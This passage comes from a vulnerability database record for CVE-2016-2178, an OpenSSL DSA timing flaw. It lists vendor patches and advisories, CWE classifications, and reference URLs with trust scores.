"id": null } ], "trust": 0.4102494200000001 }, "last_update_date": "2024-07-23T19:37:05.973000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "HPSBGN03658", "trust": 0.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05302448" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Security updates for all active release lines, September 2016", "trust": 0.8, "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/" }, { "title": "Fix DSA, preserve BN_FLG_CONSTTIME", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=399944622df7bd81af62e67ea967c470534090e2" }, { "title": "SUSE-SU-2016:2470", "trust": 0.8, "url": "https://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "Bug 1343400", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1343400" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "Splunk Enterprise 6.4.5 addresses multiple vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapue" }, { "title": "Splunk Enterprise 6.5.1 addresses multiple OpenSSL vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "TLSA-2016-17", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-17j.html" }, { "title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171659 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171658 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 7", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20170194 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 6", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20170193 - security advisory" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Red Hat: CVE-2016-2178", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2178" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-2178" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Amazon Linux AMI: ALAS-2016-755", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-755" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2178 " }, { "title": "alpine-cvecheck", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2178" }, { "db": "JVNDB", "id": "JVNDB-2016-003305" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-203", "trust": 1.0 }, { "problemtype": "CWE-200", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "db": "NVD", "id": "CVE-2016-2178" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 1.4, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1343400" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.4, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.3, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 1.2, "url": "http://eprint.iacr.org/2016/594.pdf" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2017:1658" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2017-1659.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/09/8" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html" }, { "trust": 1.1, "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05302448" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91081" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1036054" }, { "trust": 1.1, "url": "http://www.splunk.com/view/sp-caaapue" }, { "trust": 1.1, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "trust": 1.1, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2017:0194" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2017:0193" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10215" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00005.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3673" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00024.html" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k53084033" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/12" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/11" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/10" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00029.html" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/6" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/5" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/4" }, { "trust": 1.1, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1749-security-advisory-24" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00012.html" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/8" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/08/7" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00032.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00023.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00011.html" }, { "trust": 1.1, "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170322-01-openssl-en" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00031.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2017/jul/31" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00021.html" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c05302448" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00022.html" }, { "trust": 1.1, "url": "http://www.openwall.com/lists/oss-security/2016/06/09/2" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=399944622df7bd81af62e67ea967c470534090e2" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2178" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2178" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://eprint.iacr.org/2016/594" }, { "trust": 0.3, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=399944622df7bd81af62e67ea967c470534090e2" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995935" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991896" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21994870" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009586" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1009648" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21985392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992348" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992427" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992681" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21994534" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21994861" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000242" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/2688611" }, { "trust": 0.2, "url": "https://access.redhat.com/solutions/222023" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-8610" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8610" }, { "trust": 0.2, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/203.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2017:1659" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49001" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2180" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6306" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2179" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2182" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6302" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1626883" }, { "trust": 0.1, "url": "https://issues.jboss.org/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3196" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6808" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1838" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1839" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4483" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3523" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2842" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-8612" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0797" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": 